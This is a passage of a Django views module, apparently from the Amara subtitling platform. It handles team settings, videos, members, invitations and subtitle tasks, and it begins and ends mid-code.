# Cheat and reduce the number of videos on the page if we're dealing with\n # someone who can edit videos in the team, for performance reasons.\n is_editor = True\n per_page = 8\n else:\n is_editor = False\n per_page = VIDEOS_ON_PAGE\n\n general_settings = {}\n add_general_settings(request, general_settings)\n extra_context['general_settings'] = json.dumps(general_settings)\n\n if team.video:\n extra_context['widget_params'] = base_widget_params(request, {\n 'video_url': team.video.get_video_url(),\n 'base_state': {}\n })\n\n readable_langs = TeamLanguagePreference.objects.get_readable(team)\n language_choices = [(code, name) for code, name in get_language_choices()\n if code in readable_langs]\n\n extra_context['language_choices'] = language_choices\n extra_context['query'] = query\n\n sort_names = {\n 'name': 'Name, A-Z',\n '-name': 'Name, Z-A',\n 'time': 'Time, Oldest',\n '-time': 'Time, Newest',\n 'subs': 'Subtitles, Least',\n '-subs': 'Subtitles, Most',\n }\n if sort:\n extra_context['order_name'] = sort_names[sort]\n else:\n extra_context['order_name'] = sort_names['-time']\n\n extra_context['current_videos_count'] = qs.count()\n extra_context['filtered'] = filtered\n\n team_video_md_list, pagination_info = paginate(qs, per_page, request.GET.get('page'))\n extra_context.update(pagination_info)\n extra_context['team_video_md_list'] = team_video_md_list\n extra_context['team_workflows'] = list(\n Workflow.objects.filter(team=team.id)\n .select_related('project', 'team', 'team_video'))\n\n if is_editor:\n team_video_ids = [record.team_video_pk for record in team_video_md_list]\n team_videos = list(TeamVideo.objects.filter(id__in=team_video_ids).select_related('video', 'team', 'project'))\n team_videos = dict((tv.pk, tv) for tv in team_videos)\n for record in team_video_md_list:\n if record:\n record._team_video = team_videos.get(record.team_video_pk)\n if record._team_video:\n record._team_video.original_language_code = record.original_language\n record._team_video.completed_langs = record.video_completed_langs\n\n return extra_context\n\ndef role_saved(request, slug):\n messages.success(request, _(u'Member saved.'))\n return_path = reverse('teams:detail_members', args=[], kwargs={'slug': slug})\n return HttpResponseRedirect(return_path)\n\ndef completed_videos(request, slug):\n team = Team.get(slug, request.user)\n if team.is_member(request.user):\n qs = TeamVideoLanguagesIndex.results_for_members(team)\n else:\n qs = TeamVideoLanguagesIndex.results()\n qs = qs.filter(team_id=team.id).filter(is_complete=True).order_by('-video_complete_date')\n\n extra_context = widget.add_onsite_js_files({})\n extra_context.update({\n 'team': team\n })\n\n if team.video:\n extra_context['widget_params'] = base_widget_params(request, {\n 'video_url': team.video.get_video_url(),\n 'base_state': {}\n })\n\n return object_list(request, queryset=qs,\n paginate_by=VIDEOS_ON_PAGE,\n template_name='teams/completed_videos.html',\n extra_context=extra_context,\n template_object_name='team_video')\n\ndef videos_actions(request, slug):\n team = Team.get(slug, request.user)\n\n try:\n user = request.user if request.user.is_authenticated() else None\n member = team.members.get(user=user) if user else None\n except TeamMember.DoesNotExist:\n member = False\n\n public_only = False if member else True\n qs = Action.objects.for_team(team, public_only=public_only)\n\n extra_context = {\n 'team': team\n }\n return object_list(request, queryset=qs,\n paginate_by=ACTIONS_ON_PAGE,\n 
template_name='teams/videos_actions.html',\n extra_context=extra_context,\n template_object_name='videos_action')\n\n@render_to('teams/create.html')\n@staff_member_required\ndef create(request):\n user = request.user\n\n if not DEV and not (user.is_superuser and user.is_active):\n raise Http404\n\n if request.method == 'POST':\n form = CreateTeamForm(request.user, request.POST, request.FILES)\n if form.is_valid():\n team = form.save(user)\n messages.success(request, _(\"\"\"\n Your team has been created. Here are some next steps:\n \n \"\"\" % dict(\n edit=reverse(\"teams:settings_permissions\", kwargs={\"slug\": team.slug}),\n activate=reverse(\"teams:settings_permissions\", kwargs={\"slug\": team.slug}),\n create=reverse(\"teams:settings_projects\", kwargs={\"slug\": team.slug}),\n lang=reverse(\"teams:settings_languages\", kwargs={\"slug\": team.slug}),\n custom=reverse(\"teams:settings_guidelines\", kwargs={\"slug\": team.slug}),\n )))\n return redirect(reverse(\"teams:settings_basic\", kwargs={\"slug\":team.slug}))\n else:\n form = CreateTeamForm(request.user)\n\n return { 'form': form }\n\n\n# Settings\ndef _delete_team(request, team):\n if not can_delete_team(team, request.user):\n messages.error(request, _(u'You do not have permission to delete this team.'))\n return None\n\n team.deleted = True\n team.save()\n\n return HttpResponseRedirect(reverse('teams:index'))\n\n@render_to('teams/settings.html')\n@login_required\ndef settings_basic(request, slug):\n team = Team.get(slug, request.user)\n\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n if request.POST.get('delete'):\n r = _delete_team(request, team)\n if r:\n return r\n\n if can_rename_team(team, request.user):\n FormClass = RenameableSettingsForm\n else:\n FormClass = SettingsForm\n\n if request.POST:\n form = FormClass(request.POST, request.FILES, instance=team)\n\n if form.is_valid():\n try:\n form.save()\n except:\n logger.exception(\"Error on changing team settings\")\n raise\n\n messages.success(request, _(u'Settings saved.'))\n return HttpResponseRedirect(request.path)\n else:\n form = FormClass(instance=team)\n\n return { 'team': team, 'form': form, }\n\n@render_to('teams/settings-guidelines.html')\n@login_required\ndef settings_guidelines(request, slug):\n team = Team.get(slug, request.user)\n\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n initial = dict((s.key_name, s.data) for s in team.settings.messages_guidelines())\n if request.POST:\n form = GuidelinesMessagesForm(request.POST, initial=initial)\n\n if form.is_valid():\n for key, val in form.cleaned_data.items():\n setting, c = Setting.objects.get_or_create(team=team, key=Setting.KEY_IDS[key])\n setting.data = val\n setting.save()\n\n messages.success(request, _(u'Guidelines and messages updated.'))\n return HttpResponseRedirect(request.path)\n else:\n form = GuidelinesMessagesForm(initial=initial)\n\n return { 'team': team, 'form': form, }\n\n@render_to('teams/settings-permissions.html')\n@login_required\ndef settings_permissions(request, slug):\n team = Team.get(slug, request.user)\n workflow = Workflow.get_for_target(team.id, 'team')\n moderated = team.moderates_videos()\n\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have 
permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n if request.POST:\n form = PermissionsForm(request.POST, instance=team)\n workflow_form = WorkflowForm(request.POST, instance=workflow)\n\n if form.is_valid() and workflow_form.is_valid():\n form.save()\n\n if form.cleaned_data['workflow_enabled']:\n workflow_form.save()\n\n moderation_changed = moderated != form.instance.moderates_videos()\n if moderation_changed:\n update_video_moderation.delay(team)\n invalidate_video_moderation_caches.delay(team)\n\n messages.success(request, _(u'Settings saved.'))\n return HttpResponseRedirect(request.path)\n else:\n form = PermissionsForm(instance=team)\n workflow_form = WorkflowForm(instance=workflow)\n\n return { 'team': team, 'form': form, 'workflow_form': workflow_form, }\n\n@render_to('teams/settings-projects.html')\n@login_required\ndef settings_projects(request, slug):\n team = Team.get(slug, request.user)\n projects = team.project_set.exclude(name=Project.DEFAULT_NAME)\n\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n return { 'team': team, 'projects': projects, }\n\ndef _set_languages(team, codes_preferred, codes_blacklisted):\n tlps = TeamLanguagePreference.objects.for_team(team)\n\n existing = set(tlp.language_code for tlp in tlps)\n\n desired_preferred = set(codes_preferred)\n desired_blacklisted = set(codes_blacklisted)\n desired = desired_preferred | desired_blacklisted\n\n # Figure out which languages need to be deleted/created/changed.\n to_delete = existing - desired\n\n to_create_preferred = desired_preferred - existing\n to_set_preferred = desired_preferred & existing\n\n to_create_blacklisted = desired_blacklisted - existing\n to_set_blacklisted = desired_blacklisted & existing\n\n # Delete unneeded prefs.\n for tlp in tlps.filter(language_code__in=to_delete):\n tlp.delete()\n\n # Change existing prefs.\n for tlp in tlps.filter(language_code__in=to_set_preferred):\n tlp.preferred, tlp.allow_reads, tlp.allow_writes = True, False, False\n tlp.save()\n\n for tlp in tlps.filter(language_code__in=to_set_blacklisted):\n tlp.preferred, tlp.allow_reads, tlp.allow_writes = False, False, False\n tlp.save()\n\n # Create remaining prefs.\n for lang in to_create_preferred:\n tlp = TeamLanguagePreference(team=team, language_code=lang,\n allow_reads=False, allow_writes=False,\n preferred=True)\n tlp.save()\n\n for lang in to_create_blacklisted:\n tlp = TeamLanguagePreference(team=team, language_code=lang,\n allow_reads=False, allow_writes=False,\n preferred=False)\n tlp.save()\n\n@render_to('teams/settings-languages.html')\n@login_required\ndef settings_languages(request, slug):\n team = Team.get(slug, request.user)\n\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n preferred = [tlp.language_code for tlp in\n TeamLanguagePreference.objects.for_team(team).filter(preferred=True)]\n blacklisted = [tlp.language_code for tlp in\n TeamLanguagePreference.objects.for_team(team).filter(preferred=False)]\n initial = {'preferred': preferred, 'blacklisted': blacklisted}\n\n if request.POST:\n form = LanguagesForm(team, request.POST, initial=initial)\n\n if form.is_valid():\n _set_languages(team, form.cleaned_data['preferred'], form.cleaned_data['blacklisted'])\n\n 
messages.success(request, _(u'Settings saved.'))\n invalidate_video_caches.delay(team.pk)\n return HttpResponseRedirect(request.path)\n else:\n form = LanguagesForm(team, initial=initial)\n\n return { 'team': team, 'form': form }\n\n\n# Videos\n@render_to('teams/add_video.html')\n@login_required\ndef add_video(request, slug):\n team = Team.get(slug, request.user)\n\n project_id = request.GET.get('project') or request.POST.get('project') or None\n project = Project.objects.get(team=team, pk=project_id) if project_id else team.default_project\n\n if request.POST and not can_add_video(team, request.user, project):\n messages.error(request, _(u\"You can't add that video to this team/project.\"))\n return HttpResponseRedirect(team.get_absolute_url())\n\n initial = {\n 'video_url': request.GET.get('url', ''),\n 'title': request.GET.get('title', '')\n }\n\n if project:\n initial['project'] = project\n\n form = AddTeamVideoForm(team, request.user, request.POST or None, request.FILES or None, initial=initial)\n\n if form.is_valid():\n obj = form.save(False)\n obj.added_by = request.user\n obj.save()\n api_teamvideo_new.send(obj)\n messages.success(request, form.success_message())\n return redirect(team.get_absolute_url())\n\n return {\n 'form': form,\n 'team': team\n }\n\n@login_required\ndef move_video(request):\n form = MoveTeamVideoForm(request.user, request.POST)\n\n if form.is_valid():\n team_video = form.cleaned_data['team_video']\n team = form.cleaned_data['team']\n project = form.cleaned_data['project']\n team_video.move_to(team, project)\n messages.success(request, _(u'The video has been moved to the new team.'))\n else:\n for e in flatten_errorlists(form.errors):\n messages.error(request, e)\n\n return HttpResponseRedirect(request.POST.get('next', '/'))\n\n@render_to('teams/add_videos.html')\n@login_required\ndef add_videos(request, slug):\n team = Team.get(slug, request.user)\n\n if not can_add_video(team, request.user):\n messages.error(request, _(u\"You can't add videos to this team/project.\"))\n return HttpResponseRedirect(team.get_absolute_url())\n\n form = AddTeamVideosFromFeedForm(team, request.user, request.POST or None)\n\n if form.is_valid():\n team_videos = form.save()\n [api_teamvideo_new.send(tv) for tv in team_videos]\n messages.success(request, form.success_message() % {'count': len(team_videos)})\n return redirect(team)\n\n return { 'form': form, 'team': team, }\n\n@login_required\n@render_to('teams/team_video.html')\ndef team_video(request, team_video_pk):\n team_video = get_object_or_404(TeamVideo, pk=team_video_pk)\n\n if not can_edit_video(team_video, request.user):\n messages.error(request, _(u'You can\\'t edit this video.'))\n return HttpResponseRedirect(team_video.team.get_absolute_url())\n\n meta = team_video.video.metadata()\n form = EditTeamVideoForm(request.POST or None, request.FILES or None,\n instance=team_video, user=request.user, initial=meta)\n\n if form.is_valid():\n form.save()\n messages.success(request, _('Video has been updated.'))\n return redirect(team_video)\n\n context = widget.add_onsite_js_files({})\n\n context.update({\n 'team': team_video.team,\n 'team_video': team_video,\n 'form': form,\n 'user': request.user,\n 'widget_params': base_widget_params(request, {'video_url': team_video.video.get_video_url(), 'base_state': {}})\n })\n return context\n\n@render_to_json\n@login_required\ndef remove_video(request, team_video_pk):\n def _error_resp(request, next, error):\n if request.is_ajax():\n return { 'success': False, 'error': error }\n else:\n 
messages.error(request, error)\n return HttpResponseRedirect(next)\n\n team_video = get_object_or_404(TeamVideo, pk=team_video_pk)\n\n if request.method != 'POST':\n return _error_resp(request, reverse('teams:user_teams'),\n _(u'Request must be a POST request.'))\n\n next = request.POST.get('next', reverse('teams:user_teams'))\n wants_delete = request.POST.get('del-opt') == 'total-destruction'\n\n if wants_delete:\n if not can_delete_video(team_video, request.user):\n return _error_resp(request, next,\n _(u\"You can't delete that video.\"))\n else:\n if not can_remove_video(team_video, request.user):\n return _error_resp(request, next,\n _(u\"You can't remove that video.\"))\n\n for task in team_video.task_set.all():\n task.delete()\n\n video = team_video.video\n\n team_video.delete()\n\n if wants_delete:\n video.delete()\n msg = _(u'Video has been deleted from Amara.')\n else:\n msg = _(u'Video has been removed from the team.')\n\n if request.is_ajax():\n return { 'success': True }\n else:\n messages.success(request, msg)\n return HttpResponseRedirect(next)\n\n\n# Members\n@render_to('teams/members-list.html')\ndef detail_members(request, slug, role=None):\n q = request.REQUEST.get('q')\n lang = request.GET.get('lang')\n filtered = False\n\n team = Team.get(slug, request.user)\n qs = team.members.select_related('user').filter(user__is_active=True)\n\n if q:\n filtered = True\n for term in filter(None, [term.strip() for term in q.split()]):\n qs = qs.filter(Q(user__first_name__icontains=term)\n | Q(user__last_name__icontains=term)\n | Q(user__email__icontains=term)\n | Q(user__username__icontains=term)\n | Q(user__biography__icontains=term))\n\n if lang:\n filtered = True\n qs = qs.filter(user__userlanguage__language=lang)\n\n if role:\n filtered = True\n if role == 'admin':\n qs = qs.filter(role__in=[TeamMember.ROLE_OWNER, TeamMember.ROLE_ADMIN])\n else:\n qs = qs.filter(role=role)\n\n extra_context = widget.add_onsite_js_files({})\n extra_context['filtered'] = filtered\n\n team_member_list, pagination_info = paginate(qs, MEMBERS_ON_PAGE, request.GET.get('page'))\n extra_context.update(pagination_info)\n extra_context['team_member_list'] = team_member_list\n\n # if we are a member that can also edit roles, we create a dict of\n # roles that we can assign, this will vary from user to user, since\n # let's say an admin can change roles, but not for anyone above him\n # the owner, for example\n assignable_roles = []\n if roles_user_can_assign(team, request.user):\n for member in team_member_list:\n if can_assign_role(team, request.user, member.role, member.user):\n assignable_roles.append(member)\n\n users = team.members.values_list('user', flat=True)\n user_langs = set(UserLanguage.objects.filter(user__in=users).values_list('language', flat=True))\n\n extra_context.update({\n 'team': team,\n 'query': q,\n 'role': role,\n 'assignable_roles': assignable_roles,\n 'languages': sorted(languages_with_labels(user_langs).items(), key=lambda pair: pair[1]),\n })\n\n if team.video:\n extra_context['widget_params'] = base_widget_params(request, {\n 'video_url': team.video.get_video_url(),\n 'base_state': {}\n })\n\n return extra_context\n\n@login_required\ndef remove_member(request, slug, user_pk):\n team = Team.get(slug, request.user)\n\n member = get_object_or_404(TeamMember, team=team, user__pk=user_pk)\n\n return_path = reverse('teams:detail_members', args=[], kwargs={'slug': slug})\n\n if can_assign_role(team, request.user, member.role, member.user):\n user = member.user\n if not user == 
request.user:\n TeamMember.objects.filter(team=team, user=user).delete()\n messages.success(request, _(u'Member has been removed from the team.'))\n return HttpResponseRedirect(return_path)\n else:\n messages.error(request, _(u'Use the \"Leave this team\" button to remove yourself from this team.'))\n return HttpResponseRedirect(return_path)\n else:\n messages.error(request, _(u'You don\\'t have permission to remove this member from the team.'))\n return HttpResponseRedirect(return_path)\n\n@login_required\ndef applications(request, slug):\n team = Team.get(slug, request.user)\n\n if not team.is_member(request.user):\n return HttpResponseForbidden(\"Not allowed\")\n\n qs = team.applications.all()\n\n extra_context = {\n 'team': team\n }\n return object_list(request, queryset=qs,\n paginate_by=APLICATIONS_ON_PAGE,\n template_name='teams/applications.html',\n template_object_name='applications',\n extra_context=extra_context)\n\n@login_required\ndef approve_application(request, slug, user_pk):\n team = Team.get(slug, request.user)\n\n if not team.is_member(request.user):\n raise Http404\n\n if can_invite(team, request.user):\n try:\n Application.objects.get(team=team, user=user_pk).approve()\n messages.success(request, _(u'Application approved.'))\n except Application.DoesNotExist:\n messages.error(request, _(u'Application does not exist.'))\n else:\n messages.error(request, _(u'You can\\'t approve applications.'))\n\n return redirect('teams:applications', team.pk)\n\n@login_required\ndef deny_application(request, slug, user_pk):\n team = Team.get(slug, request.user)\n\n if not team.is_member(request.user):\n raise Http404\n\n if can_invite(team, request.user):\n try:\n Application.objects.get(team=team, user=user_pk).deny()\n messages.success(request, _(u'Application denied.'))\n except Application.DoesNotExist:\n messages.error(request, _(u'Application does not exist.'))\n else:\n messages.error(request, _(u'You can\\'t deny applications.'))\n\n return redirect('teams:applications', team.pk)\n\n@render_to('teams/invite_members.html')\n@login_required\ndef invite_members(request, slug):\n team = Team.get(slug, request.user)\n\n if not can_invite(team, request.user):\n return HttpResponseForbidden(_(u'You cannot invite people to this team.'))\n if request.POST:\n form = InviteForm(team, request.user, request.POST)\n if form.is_valid():\n # the form will fire the notifications for invitees\n # this cannot be done on model signal, since you might be\n # sending invites twice for the same user, and that borks\n # the naive signal for only created invitations\n form.save()\n return HttpResponseRedirect(reverse('teams:detail_members',\n args=[], kwargs={'slug': team.slug}))\n else:\n form = InviteForm(team, request.user)\n\n return {\n 'team': team,\n 'form': form,\n }\n\n@login_required\ndef accept_invite(request, invite_pk, accept=True):\n invite = get_object_or_404(Invite, pk=invite_pk, user=request.user)\n\n if accept:\n invite.accept()\n else:\n invite.deny()\n\n return redirect(request.META.get('HTTP_REFERER', '/'))\n\n@login_required\ndef join_team(request, slug):\n team = get_object_or_404(Team, slug=slug)\n user = request.user\n\n if not can_join_team(team, user):\n messages.error(request, _(u'You cannot join this team.'))\n else:\n member = TeamMember(team=team, user=user, role=TeamMember.ROLE_CONTRIBUTOR)\n member.save()\n messages.success(request, _(u'You are now a member of this team.'))\n notifier.team_member_new.delay(member.pk)\n return redirect(team)\n\ndef _check_can_leave(team, 
user):\n \"\"\"Return an error message if the member cannot leave the team, otherwise None.\"\"\"\n\n try:\n member = TeamMember.objects.get(team=team, user=user)\n except TeamMember.DoesNotExist:\n return u'You are not a member of this team.'\n\n if not team.members.exclude(pk=member.pk).exists():\n return u'You are the last member of this team.'\n\n is_last_owner = (\n member.role == TeamMember.ROLE_OWNER\n and not team.members.filter(role=TeamMember.ROLE_OWNER).exclude(pk=member.pk).exists()\n )\n if is_last_owner:\n return u'You are the last owner of this team.'\n\n is_last_admin = (\n member.role == TeamMember.ROLE_ADMIN\n and not team.members.filter(role=TeamMember.ROLE_ADMIN).exclude(pk=member.pk).exists()\n and not team.members.filter(role=TeamMember.ROLE_OWNER).exists()\n )\n if is_last_admin:\n return u'You are the last admin of this team.'\n\n return None\n\n@login_required\ndef leave_team(request, slug):\n team = get_object_or_404(Team, slug=slug)\n user = request.user\n\n error = _check_can_leave(team, user)\n if error:\n messages.error(request, _(error))\n else:\n member = TeamMember.objects.get(team=team, user=user)\n tm_user_pk = member.user.pk\n team_pk = member.team.pk\n member.delete()\n notifier.team_member_leave(team_pk, tm_user_pk)\n\n messages.success(request, _(u'You have left this team.'))\n\n return redirect(request.META.get('HTTP_REFERER') or team)\n\n@permission_required('teams.change_team')\ndef highlight(request, slug, highlight=True):\n item = get_object_or_404(Team, slug=slug)\n item.highlight = highlight\n item.save()\n return redirect(request.META.get('HTTP_REFERER', '/'))\n\ndef _member_search_result(member, team, task_id, team_video_id, task_type, task_lang):\n result = [member.user.id, u'%s (%s)' % (member.user, member.user.username)]\n\n if task_id:\n task = Task.objects.not_deleted().get(team=team, pk=task_id)\n if member.has_max_tasks():\n result += [False]\n else:\n result += [can_perform_task(member.user, task)]\n elif team_video_id:\n team_video = TeamVideo.objects.get(pk=team_video_id)\n if member.has_max_tasks():\n result += [False]\n else:\n result += [can_perform_task_for(member.user, task_type, team_video, task_lang)]\n else:\n result += [None]\n\n return result\n\n@render_to_json\ndef search_members(request, slug):\n team = Team.get(slug, request.user)\n q = request.GET.get('term', '').replace('(', '').replace(')', '')\n terms = get_terms(q)\n\n task_id = request.GET.get('task')\n task_type = request.GET.get('task_type')\n task_lang = request.GET.get('task_lang')\n team_video_id = request.GET.get('team_video')\n\n members = team.members.filter(user__is_active=True)\n for term in terms:\n members = members.filter(\n Q(user__username__icontains=term) |\n Q(user__first_name__icontains=term) |\n Q(user__last_name__icontains=term)\n )\n members = members.select_related('user')[:MAX_MEMBER_SEARCH_RESULTS]\n\n results = [_member_search_result(m, team, task_id, team_video_id, task_type, task_lang)\n for m in members]\n\n return { 'results': results }\n\n\n# Tasks\ndef _get_or_create_workflow(team_slug, project_id, team_video_id):\n try:\n workflow = Workflow.objects.get(team__slug=team_slug, project=project_id,\n team_video=team_video_id)\n except Workflow.DoesNotExist:\n # We special case this because Django won't let us create new models\n # with the IDs, we need to actually pass in the Model objects for\n # the ForeignKey fields.\n #\n # Most of the time we won't need to do these three extra queries.\n\n team = Team.objects.get(slug=team_slug)\n 
project = Project.objects.get(pk=project_id) if project_id else None\n team_video = TeamVideo.objects.get(pk=team_video_id) if team_video_id else None\n\n workflow = Workflow(team=team, project=project, team_video=team_video)\n\n return workflow\n\ndef _task_languages(team, user):\n languages = filter(None, Task.objects.filter(team=team, deleted=False)\n .values_list('language', flat=True)\n .distinct())\n\n language_labels = dict(get_language_choices(with_empty=True))\n\n # TODO: Handle the team language setting here once team settings are\n # implemented.\n languages = list(set(languages))\n lang_data = []\n for l in languages:\n if language_labels.get(l):\n lang_data.append({'code': l, 'name': language_labels[l]} )\n else:\n logger.error(\"Failed to find language code for task\", extra={\n \"data\": {\n \"language_code\": l,\n \"supported\": language_labels\n }\n })\n return lang_data\n\ndef _task_category_counts(team, filters, user):\n tasks = team.task_set.incomplete()\n\n if filters['language']:\n tasks = tasks.filter(language=filters['language'])\n\n if filters['team_video']:\n tasks = tasks.filter(team_video=int(filters['team_video']))\n\n if filters['assignee']:\n if filters['assignee'] == 'none':\n tasks = tasks.filter(assignee=None)\n else:\n tasks = tasks.filter(assignee=user)\n\n counts = { 'all': tasks.count() }\n\n for type in ['Subtitle', 'Translate', 'Review', 'Approve']:\n counts[type.lower()] = tasks.filter(type=Task.TYPE_IDS[type]).count()\n\n return counts\n\ndef _tasks_list(request, team, project, filters, user):\n '''List tasks for the given team, optionally filtered.\n\n `filters` should be an object/dict with zero or more of the following keys:\n\n * type: a string describing the type of task. 'Subtitle', 'Translate', etc.\n * completed: true or false\n * assignee: user ID as an integer\n * team_video: team video ID as an integer\n\n '''\n tasks = Task.objects.filter(team=team.id, deleted=False)\n\n if project:\n tasks = tasks.filter(team_video__project = project)\n\n if filters.get('team_video'):\n tasks = tasks.filter(team_video=filters['team_video'])\n\n if filters.get('completed'):\n tasks = tasks.filter(completed__isnull=False)\n else:\n tasks = tasks.filter(completed=None)\n\n if filters.get('language'):\n if filters.get('language') == 'mine' and request.user.is_authenticated():\n tasks = tasks.filter(language__in=[ul.language for ul in request.user.get_languages()])\n else:\n tasks = tasks.filter(language=filters['language'])\n\n if filters.get('q'):\n terms = get_terms(filters['q'])\n for term in terms:\n tasks = tasks.filter(\n Q(team_video__video__title__icontains=term)\n | Q(team_video__title__icontains=term)\n )\n\n if filters.get('type'):\n tasks = tasks.filter(type=Task.TYPE_IDS[filters['type']])\n\n if filters.get('assignee'):\n assignee = filters.get('assignee')\n\n if assignee == 'me':\n tasks = tasks.filter(assignee=user)\n elif assignee == 'none':\n tasks = tasks.filter(assignee=None)\n elif assignee and assignee.isdigit():\n tasks = tasks.filter(assignee=int(assignee))\n elif assignee:\n tasks = tasks.filter(assignee=User.objects.get(username=assignee))\n\n return tasks.select_related('team_video__video', 'team_video__team', 'assignee', 'team', 'team_video__project')\n\ndef _order_tasks(request, tasks):\n sort = request.GET.get('sort', '-created')\n\n if sort == 'created':\n tasks = tasks.order_by('created')\n elif sort == '-created':\n tasks = tasks.order_by('-created')\n elif sort == 'expires':\n tasks = 
tasks.exclude(expiration_date=None).order_by('expiration_date')\n elif sort == '-expires':\n tasks = tasks.exclude(expiration_date=None).order_by('-expiration_date')\n\n return tasks\n\ndef _get_task_filters(request):\n return { 'language': request.GET.get('lang'),\n 'type': request.GET.get('type'),\n 'team_video': request.GET.get('team_video'),\n 'assignee': request.GET.get('assignee'),\n 'q': request.GET.get('q'), }\n\n@render_to('teams/tasks.html')\ndef team_tasks(request, slug, project_slug=None):\n team = Team.get(slug, request.user)\n\n if not can_view_tasks_tab(team, request.user):\n messages.error(request, _(\"You cannot view this team's tasks.\"))\n return HttpResponseRedirect(team.get_absolute_url())\n\n # TODO: Review this\n if project_slug is not None:\n project = get_object_or_404(Project, team=team, slug=project_slug)\n else:\n project = None\n\n user = request.user if request.user.is_authenticated() else None\n member = team.members.get(user=user) if user else None\n languages = _task_languages(team, request.user)\n languages = sorted(languages, key=lambda l: l['name'])\n filters = _get_task_filters(request)\n filtered = 0\n\n tasks = _order_tasks(request,\n _tasks_list(request, team, project, filters, user))\n category_counts = _task_category_counts(team, filters, request.user)\n tasks, pagination_info = paginate(tasks, TASKS_ON_PAGE, request.GET.get('page'))\n\n if filters.get('team_video'):\n filters['team_video'] = TeamVideo.objects.get(pk=filters['team_video'])\n\n if filters.get('assignee'):\n if filters['assignee'] == 'me':\n filters['assignee'] = team.members.get(user=request.user)\n elif filters['assignee'] == 'none':\n filters['assignee'] == None\n elif filters['assignee'].isdigit():\n filters['assignee'] = team.members.get(user=filters['assignee'])\n else:\n filters['assignee'] = team.members.get(user=User.objects.get(username=filters['assignee']))\n\n filtered = filtered + 1\n\n if filters.get('language'):\n filtered = filtered + 1\n\n if filters.get('type'):\n filtered = filtered + 1\n\n widget_settings = {}\n from apps.widget.rpc import add_general_settings\n add_general_settings(request, widget_settings)\n\n video_pks = [t.team_video.video_id for t in tasks]\n video_urls = dict([(vu.video_id, vu.effective_url) for vu in\n VideoUrl.objects.filter(video__in=video_pks, primary=True)])\n\n for t in tasks:\n t.cached_video_url = video_urls.get(t.team_video.video_id)\n\n context = {\n 'team': team,\n 'project': project, # TODO: Review\n 'user_can_delete_tasks': can_delete_tasks(team, request.user),\n 'user_can_assign_tasks': can_assign_tasks(team, request.user),\n 'assign_form': TaskAssignForm(team, member),\n 'languages': languages,\n 'category_counts': category_counts,\n 'tasks': tasks,\n 'filters': filters,\n 'widget_settings': widget_settings,\n 'filtered': filtered,\n 'member': member,\n 'upload_draft_form': UploadDraftForm()\n }\n\n context.update(pagination_info)\n\n return context\n\n@render_to('teams/create_task.html')\ndef create_task(request, slug, team_video_pk):\n team = get_object_or_404(Team, slug=slug)\n team_video = get_object_or_404(TeamVideo, pk=team_video_pk, team=team)\n can_assign = can_assign_tasks(team, request.user, team_video.project)\n\n if request.POST:\n form = TaskCreateForm(request.user, team, team_video, request.POST)\n\n if form.is_valid():\n task = form.save(commit=False)\n\n task.team = team\n task.team_video = team_video\n\n task.set_expiration()\n\n if task.type == Task.TYPE_IDS['Subtitle']:\n task.language = ''\n\n if task.type 
in [Task.TYPE_IDS['Review'], Task.TYPE_IDS['Approve']]:\n task.approved = Task.APPROVED_IDS['In Progress']\n task.subtitle_version = task.team_video.video.latest_version(language_code=task.language)\n\n task.save()\n notifier.team_task_assigned.delay(task.pk)\n return HttpResponseRedirect(reverse('teams:team_tasks', args=[],\n kwargs={'slug': team.slug}))\n else:\n form = TaskCreateForm(request.user, team, team_video)\n\n subtitlable = json.dumps(can_create_task_subtitle(team_video, request.user))\n translatable_languages = json.dumps(can_create_task_translate(team_video, request.user))\n\n language_choices = json.dumps(get_language_choices(True))\n\n return { 'form': form, 'team': team, 'team_video': team_video,\n 'translatable_languages': translatable_languages,\n 'language_choices': language_choices,\n 'subtitlable': subtitlable,\n 'can_assign': can_assign, }\n\n@login_required\ndef perform_task(request, slug=None, task_pk=None):\n task_pk = task_pk or request.POST.get('task_id')\n task = Task.objects.get(pk=task_pk)\n if slug:\n team = get_object_or_404(Team,slug=slug)\n if task.team != team:\n return HttpResponseForbidden(_(u'You are not allowed to perform this task.'))\n\n if not can_perform_task(request.user, task):\n return HttpResponseForbidden(_(u'You are not allowed to perform this task.'))\n\n task.assignee = request.user\n task.save()\n\n # ... perform task ...\n return HttpResponseRedirect(task.get_perform_url())\n\ndef _delete_subtitle_version(version):\n sl = version.language\n n = version.version_no\n\n # Delete this specific version...\n version.delete()\n\n # We also want to delete all draft subs leading up to this version.\n for v in sl.subtitleversion_set.filter(version_no__lt=n).order_by('-version_no'):\n if v.is_public:\n break\n v.delete()\n\n # And if we've deleted everything in the language, we can delete the language as well.\n if not sl.subtitleversion_set.exists():\n sl.delete()\n\ndef delete_task(request, slug):\n '''Mark a task as deleted.\n\n The task will not be physically deleted from the database, but will be\n flagged and won't appear in further task listings.\n\n '''\n team = get_object_or_404(Team, slug=slug)\n next = request.POST.get('next', reverse('teams:team_tasks', args=[], kwargs={'slug': slug}))\n\n form = TaskDeleteForm(team, request.user, data=request.POST)\n if form.is_valid():\n task = form.cleaned_data['task']\n video = task.team_video.video\n task.deleted = True\n\n if task.subtitle_version:\n if form.cleaned_data['discard_subs']:\n _delete_subtitle_version(task.subtitle_version)\n task.subtitle_version = None\n\n if task.get_type_display() in ['Review', 'Approve']:\n # TODO: Handle subtitle/translate tasks here too?\n if not form.cleaned_data['discard_subs'] and task.subtitle_version:\n task.subtitle_version.moderation_status = MODERATION.APPROVED\n task.subtitle_version.save()\n metadata_manager.update_metadata(video.pk)\n\n task.save()\n\n messages.success(request, _('Task deleted.'))\n else:\n messages.error(request, _('You cannot delete this task.'))\n\n return HttpResponseRedirect(next)\n\ndef assign_task(request, slug):\n '''Assign a task to the given user, or unassign it if null/None.'''\n team = get_object_or_404(Team, slug=slug)\n next = request.POST.get('next', reverse('teams:team_tasks', args=[], kwargs={'slug': slug}))\n\n form = TaskAssignForm(team, request.user, data=request.POST)\n if form.is_valid():\n task = form.cleaned_data['task']\n assignee = form.cleaned_data['assignee']\n\n if task.assignee == 